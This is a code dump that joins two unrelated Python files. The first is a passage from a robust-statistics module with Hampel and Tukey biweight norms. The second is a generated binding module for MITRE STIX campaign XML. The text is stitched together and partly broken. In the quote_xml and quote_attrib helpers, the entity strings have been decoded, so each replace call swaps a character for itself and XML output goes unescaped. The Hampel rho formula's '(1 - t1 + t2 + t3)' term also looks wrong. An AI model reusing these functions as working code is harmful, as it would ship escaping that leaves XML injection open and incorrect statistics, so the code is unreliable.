rho(z) = a*(c*\|z\|-(1/2.)*z**2)/(c-b) for b < \|z\| <= c
rho(z) = a*(b + c - a) for \|z\| > c
"""
z = np.fabs(z)
a = self.a; b = self.b; c = self.c
t1, t2, t3 = self._subset(z)
v = (t1 * z**2 * 0.5 +
t2 * (a * z - a**2 * 0.5) +
t3 * (a * (c * z - z**2 * 0.5) / (c - b) - 7 * a**2 / 6.) +
(1 - t1 + t2 + t3) * a * (b + c - a))
return v
def psi(self, z):
"""
The psi function for Hampel's estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z for \|z\| <= a
psi(z) = a*sign(z) for a < \|z\| <= b
psi(z) = a*sign(z)*(c - \|z\|)/(c-b) for b < \|z\| <= c
psi(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
a = self.a; b = self.b; c = self.c
t1, t2, t3 = self._subset(z)
s = np.sign(z)
z = np.fabs(z)
v = s * (t1 * z +
t2 * a*s +
t3 * a*s * (c - z) / (c - b))
return v
def weights(self, z):
"""
Hampel weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = 1 for \|z\| <= a
weights(z) = a/\|z\| for a < \|z\| <= b
weights(z) = a*(c - \|z\|)/(\|z\|*(c-b)) for b < \|z\| <= c
weights(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
a = self.a; b = self.b; c = self.c
t1, t2, t3 = self._subset(z)
v = (t1 +
t2 * a/np.fabs(z) +
t3 * a*(c-np.fabs(z))/(np.fabs(z)*(c-b)))
v[np.where(np.isnan(v))]=1. # for some reason 0 returns a nan?
return v
def psi_deriv(self, z):
t1, t2, t3 = self._subset(z)
return t1 + t3 * (self.a*np.sign(z)*z)/(np.fabs(z)*(self.c-self.b))
class TukeyBiweight(RobustNorm):
"""
Tukey's biweight function for M-estimation.
Parameters
----------
c : float, optional
The tuning constant for Tukey's Biweight. The default value is
c = 4.685.
Notes
-----
Tukey's biweight is sometime's called bisquare.
"""
def __init__(self, c = 4.685):
self.c = c
def _subset(self, z):
"""
Tukey's biweight is defined piecewise over the range of z
"""
z = np.fabs(np.asarray(z))
return np.less_equal(z, self.c)
def rho(self, z):
"""
The robust criterion function for Tukey's biweight estimator
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = -(1 - (z/c)**2)**3 * c**2/6. for \|z\| <= R
rho(z) = 0 for \|z\| > R
"""
subset = self._subset(z)
return -(1 - (z / self.c)**2)**3 * subset * self.c**2 / 6.
def psi(self, z):
"""
The psi function for Tukey's biweight estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z*(1 - (z/c)**2)**2 for \|z\| <= R
psi(z) = 0 for \|z\| > R
"""
z = np.asarray(z)
subset = self._subset(z)
return z * (1 - (z / self.c)**2)**2 * subset
def weights(self, z):
"""
Tukey's biweight weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
psi(z) = (1 - (z/c)**2)**2 for \|z\| <= R
psi(z) = 0 for \|z\| > R
"""
subset = self._subset(z)
return (1 - (z / self.c)**2)**2 * subset
def psi_deriv(self, z):
"""
The derivative of Tukey's biweight psi function
Notes
-----
Used to estimate the robust covariance matrix.
"""
subset = self._subset(z)
return subset*((1 - (z/self.c)**2)**2 - (4*z**2/self.c**2) *\
(1-(z/self.c)**2))
def estimate_location(a, scale, norm=None, axis=0, initial=None,
maxiter=30, tol=1.0e-06):
"""
M-estimator of location using self.norm and a current
estimator of scale.
This iteratively finds a solution to
norm.psi((a-mu)/scale).sum() == 0
Parameters
----------
a : array
Array over which the location parameter is to be estimated
scale : array
Scale parameter to be used in M-estimator
norm : RobustNorm, optional
Robust norm used in the M-estimator. The default is HuberT().
axis : int, optional
Axis along which to estimate the location parameter. The default is 0.
initial : array, optional
Initial condition for the location parameter. Default is None, which
uses the median of a.
niter : int, optional
Maximum number of iterations. The default is 30.
tol : float, optional
Toleration for convergence. The default is 1e-06.
Returns
--------
mu : array
Estimate of location
"""
if norm is None:
norm = HuberT()
if initial is None:
mu = np.median(a, axis)
else:
mu = initial
for iter in range(maxiter):
W = norm.weights((a-mu)/scale)
nmu = np.sum(W*a, axis) / np.sum(W, axis)
if np.alltrue(np.less(np.fabs(mu - nmu), scale * tol)):
return nmu
else:
mu = nmu
raise ValueError("location estimator failed to converge in %d iterations"\
% maxiter)
|
|
# Copyright (c) 2014, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Thu Apr 11 15:06:20 2013 by generateDS.py version 2.9a.
#
import sys
import getopt
import re as re_
import cybox.bindings.cybox_core as cybox_core_binding
import stix.bindings.stix_common as stix_common_binding
import stix.bindings.data_marking as data_marking_binding
import base64
from datetime import datetime, tzinfo, timedelta
XML_NS = "http://stix.mitre.org/Campaign-1"
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser(huge_tree=True)
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(tzinfo):
def __init__(self, offset, name):
self.__offset = timedelta(minutes = offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if isinstance(input_data, basestring):
return input_data
if input_data.microsecond == 0:
_svalue = input_data.strftime('%Y-%m-%dT%H:%M:%S')
else:
_svalue = input_data.strftime('%Y-%m-%dT%H:%M:%S.%f')
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_parse_datetime(self, input_data, node, input_name=''):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
return dt.replace(tzinfo = tz)
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = input_data.strftime('%Y-%m-%d')
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_parse_date(self, input_data, node, input_name=''):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
return datetime.strptime(input_data,
'%Y-%m-%d').replace(tzinfo = tz)
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'utf-8'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(lwrite, level, pretty_print=True):
if pretty_print:
lwrite(' ' * level)
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (
msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, lwrite, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
lwrite(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(lwrite, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(lwrite, level, namespace, name, pretty_print)
def exportSimple(self, lwrite, level, name):
if self.content_type == MixedContainer.TypeString:
lwrite('<%s>%s</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
lwrite('<%s>%d</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
lwrite('<%s>%f</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
lwrite('<%s>%g</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
lwrite('<%s>%s</%s>' %
(self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, lwrite, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s", "%s"),\n'
% (self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s", "%s"),\n'
% (self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s",\n' % \
(self.category, self.content_type, self.name,))
self.value.exportLiteral(lwrite, level + 1)
showIndent(lwrite, level)
lwrite(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class NamesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Name=None):
if Name is None:
self.Name = []
else:
self.Name = Name
def factory(*args_, **kwargs_):
if NamesType.subclass:
return NamesType.subclass(*args_, **kwargs_)
else:
return NamesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Name(self): return self.Name
def set_Name(self, Name): self.Name = Name
def add_Name(self, value): self.Name.append(value)
def insert_Name(self, index, value): self.Name[index] = value
def hasContent_(self):
if (
self.Name
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='NamesType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='NamesType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='NamesType'):
pass
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='NamesType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Name_ in self.Name:
Name_.export(lwrite, level, nsmap, namespace_, name_='Name', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Name':
obj_ = stix_common_binding.ControlledVocabularyStringType.factory()
obj_.build(child_)
self.Name.append(obj_)
# end class NamesType
class AssociatedCampaignsType(stix_common_binding.GenericRelationshipListType):
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Associated_Campaign=None):
super(AssociatedCampaignsType, self).__init__(scope=scope)
if Associated_Campaign is None:
self.Associated_Campaign = []
else:
self.Associated_Campaign = Associated_Campaign
def factory(*args_, **kwargs_):
if AssociatedCampaignsType.subclass:
return AssociatedCampaignsType.subclass(*args_, **kwargs_)
else:
return AssociatedCampaignsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Associated_Campaign(self): return self.Associated_Campaign
def set_Associated_Campaign(self, Associated_Campaign): self.Associated_Campaign = Associated_Campaign
def add_Associated_Campaign(self, value): self.Associated_Campaign.append(value)
def insert_Associated_Campaign(self, index, value): self.Associated_Campaign[index] = value
def hasContent_(self):
if (
self.Associated_Campaign or
super(AssociatedCampaignsType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='AssociatedCampaignsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='AssociatedCampaignsType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='AssociatedCampaignsType'):
super(AssociatedCampaignsType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='AssociatedCampaignsType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='AssociatedCampaignsType', fromsubclass_=False, pretty_print=True):
super(AssociatedCampaignsType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Associated_Campaign_ in self.Associated_Campaign:
Associated_Campaign_.export(lwrite, level, nsmap, namespace_, name_='Associated_Campaign', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(AssociatedCampaignsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Associated_Campaign':
obj_ = stix_common_binding.RelatedCampaignType.factory()
obj_.build(child_)
self.Associated_Campaign.append(obj_)
super(AssociatedCampaignsType, self).buildChildren(child_, node, nodeName_, True)
# end class AssociatedCampaignsType
class RelatedIndicatorsType(stix_common_binding.GenericRelationshipListType):
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Related_Indicator=None):
super(RelatedIndicatorsType, self).__init__(scope=scope)
if Related_Indicator is None:
self.Related_Indicator = []
else:
self.Related_Indicator = Related_Indicator
def factory(*args_, **kwargs_):
if RelatedIndicatorsType.subclass:
return RelatedIndicatorsType.subclass(*args_, **kwargs_)
else:
return RelatedIndicatorsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Related_Indicator(self): return self.Related_Indicator
def set_Related_Indicator(self, Related_Indicator): self.Related_Indicator = Related_Indicator
def add_Related_Indicator(self, value): self.Related_Indicator.append(value)
def insert_Related_Indicator(self, index, value): self.Related_Indicator[index] = value
def hasContent_(self):
if (
self.Related_Indicator or
super(RelatedIndicatorsType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedIndicatorsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedIndicatorsType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='RelatedIndicatorsType'):
super(RelatedIndicatorsType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedIndicatorsType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedIndicatorsType', fromsubclass_=False, pretty_print=True):
super(RelatedIndicatorsType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Related_Indicator_ in self.Related_Indicator:
Related_Indicator_.export(lwrite, level, nsmap, namespace_, name_='Related_Indicator', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(RelatedIndicatorsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Related_Indicator':
obj_ = stix_common_binding.RelatedIndicatorType.factory()
obj_.build(child_)
self.Related_Indicator.append(obj_)
super(RelatedIndicatorsType, self).buildChildren(child_, node, nodeName_, True)
# end class RelatedIndicatorsType
class RelatedIncidentsType(stix_common_binding.GenericRelationshipListType):
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Related_Incident=None):
super(RelatedIncidentsType, self).__init__(scope=scope)
if Related_Incident is None:
self.Related_Incident = []
else:
self.Related_Incident = Related_Incident
def factory(*args_, **kwargs_):
if RelatedIncidentsType.subclass:
return RelatedIncidentsType.subclass(*args_, **kwargs_)
else:
return RelatedIncidentsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Related_Incident(self): return self.Related_Incident
def set_Related_Incident(self, Related_Incident): self.Related_Incident = Related_Incident
def add_Related_Incident(self, value): self.Related_Incident.append(value)
def insert_Related_Incident(self, index, value): self.Related_Incident[index] = value
def hasContent_(self):
if (
self.Related_Incident or
super(RelatedIncidentsType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedIncidentsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedIncidentsType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='RelatedIncidentsType'):
super(RelatedIncidentsType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedIncidentsType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedIncidentsType', fromsubclass_=False, pretty_print=True):
super(RelatedIncidentsType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Related_Incident_ in self.Related_Incident:
Related_Incident_.export(lwrite, level, nsmap, namespace_, name_='Related_Incident', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(RelatedIncidentsType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Related_Incident':
obj_ = stix_common_binding.RelatedIncidentType.factory()
obj_.build(child_)
self.Related_Incident.append(obj_)
super(RelatedIncidentsType, self).buildChildren(child_, node, nodeName_, True)
# end class RelatedIncidentsType
class RelatedTTPsType(stix_common_binding.GenericRelationshipListType):
subclass = None
superclass = stix_common_binding.GenericRelationshipListType
def __init__(self, scope='exclusive', Related_TTP=None):
super(RelatedTTPsType, self).__init__(scope=scope)
if Related_TTP is None:
self.Related_TTP = []
else:
self.Related_TTP = Related_TTP
def factory(*args_, **kwargs_):
if RelatedTTPsType.subclass:
return RelatedTTPsType.subclass(*args_, **kwargs_)
else:
return RelatedTTPsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Related_TTP(self): return self.Related_TTP
def set_Related_TTP(self, Related_TTP): self.Related_TTP = Related_TTP
def add_Related_TTP(self, value): self.Related_TTP.append(value)
def insert_Related_TTP(self, index, value): self.Related_TTP[index] = value
def hasContent_(self):
if (
self.Related_TTP or
super(RelatedTTPsType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedTTPsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s:%s%s' % (nsmap[namespace_], name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedTTPsType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, nsmap, XML_NS, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s:%s>%s' % (nsmap[namespace_], name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='campaign:', name_='RelatedTTPsType'):
super(RelatedTTPsType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='RelatedTTPsType')
def exportChildren(self, lwrite, level, nsmap, namespace_=XML_NS, name_='RelatedTTPsType', fromsubclass_=False, pretty_print=True):
super(RelatedTTPsType, self).exportChildren(lwrite, level, nsmap, namespace_, name_, True, pretty_print=pretty_print)
